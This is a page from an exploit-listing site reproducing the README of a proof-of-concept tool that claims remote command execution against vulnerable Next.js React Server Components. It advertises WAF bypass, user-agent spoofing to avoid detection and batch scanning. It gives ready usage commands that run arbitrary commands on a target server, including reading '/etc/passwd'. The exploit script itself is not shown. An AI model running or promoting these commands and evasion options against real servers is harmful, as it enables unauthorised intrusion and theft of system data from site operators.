Share
## https://sploitus.com/exploit?id=E810D3AC-7A32-5B7F-BA0D-401590C7DEBD
# CVE-2025-55182-poc-tool

A powerful exploit tool for detecting and exploiting **CVE-2025-55182** vulnerability in Next.js React Server Components. This tool allows remote command execution (RCE) in vulnerable Next.js applications with built-in **WAF bypass capabilities**.

## Overview

CVE-2025-55182 is a critical vulnerability in Next.js React Server Components that allows remote attackers to execute arbitrary commands on vulnerable servers. This tool provides an automated way to detect and exploit this vulnerability.

## Features
- Remote Command Execution: Execute arbitrary commands on vulnerable Next.js servers

- WAF Bypass: Built-in Web Application Firewall bypass with configurable junk data

- Custom Headers Support: Add custom HTTP headers for authentication or other purposes

- Flexible Targeting: Support for single targets and batch scanning

- Multiple Protocol Support: Automatic HTTPS/HTTP detection and handling

- Custom Timeouts: Configurable request timeouts for different network conditions

- SSL Verification Control: Option to disable SSL certificate verification

- Custom User-Agents: Spoof user agents to avoid detection

## Quick Install
```
# Clone the repository
git clone https://github.com/yourusername/cve-2025-55182-poc.git
cd CVE-2025-55182-poc-tool

# Make the script executable
chmod +x exploit.sh

# Test the installation
./exploit.sh -h
```

## Usage

The tool exposes several command-line options allowing researchers to customize requests, simulate traffic, or test filtering layers.
```bash
Usage: ./exploit.sh [OPTIONS]

Options:
  -d, --domain          Target domain/URL (default: http://localhost:3000)
                        If no protocol specified, defaults to https://
  -c, --command         Command to execute (default: id)
  -w, --waf-bypass      Enable WAF bypass with junk data (default: 128KB)
  --waf-size SIZE       WAF bypass data size in KB (default: 128)
  --timeout SECONDS     Request timeout in seconds (default: 15)
  -k, --insecure        Disable SSL certificate verification
  --user-agent AGENT    Custom User-Agent string
  -h, --help            Show this help message
```

## Basic Usage
```
# Check if target is vulnerable with default command
./exploit.sh -d https://target.com

# Execute custom command
./exploit.sh -d https://target.com -c "whoami"

# Read system files
./exploit.sh -d https://target.com -c "cat /etc/passwd"
```

## Advanced Usage
```
# Enable WAF bypass
./exploit.sh -d https://target.com -c "ls -la" -w

# Custom WAF bypass size (256KB)
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

# Disable SSL verification
./exploit.sh -d https://target.com -c "id" -k

# Custom timeout
./exploit.sh -d https://target.com -c "ping -c 3 google.com" --timeout 30

# Custom User-Agent
./exploit.sh -d https://target.com -c "id" --user-agent "CustomScanner/1.0"
```
## Credits
- This tool is based on research by the security community. Special thanks to:

[infosec_au](https://x.com/infosec_au?s=11)

[zack0x01](https://x.com/zack0x01?s=11)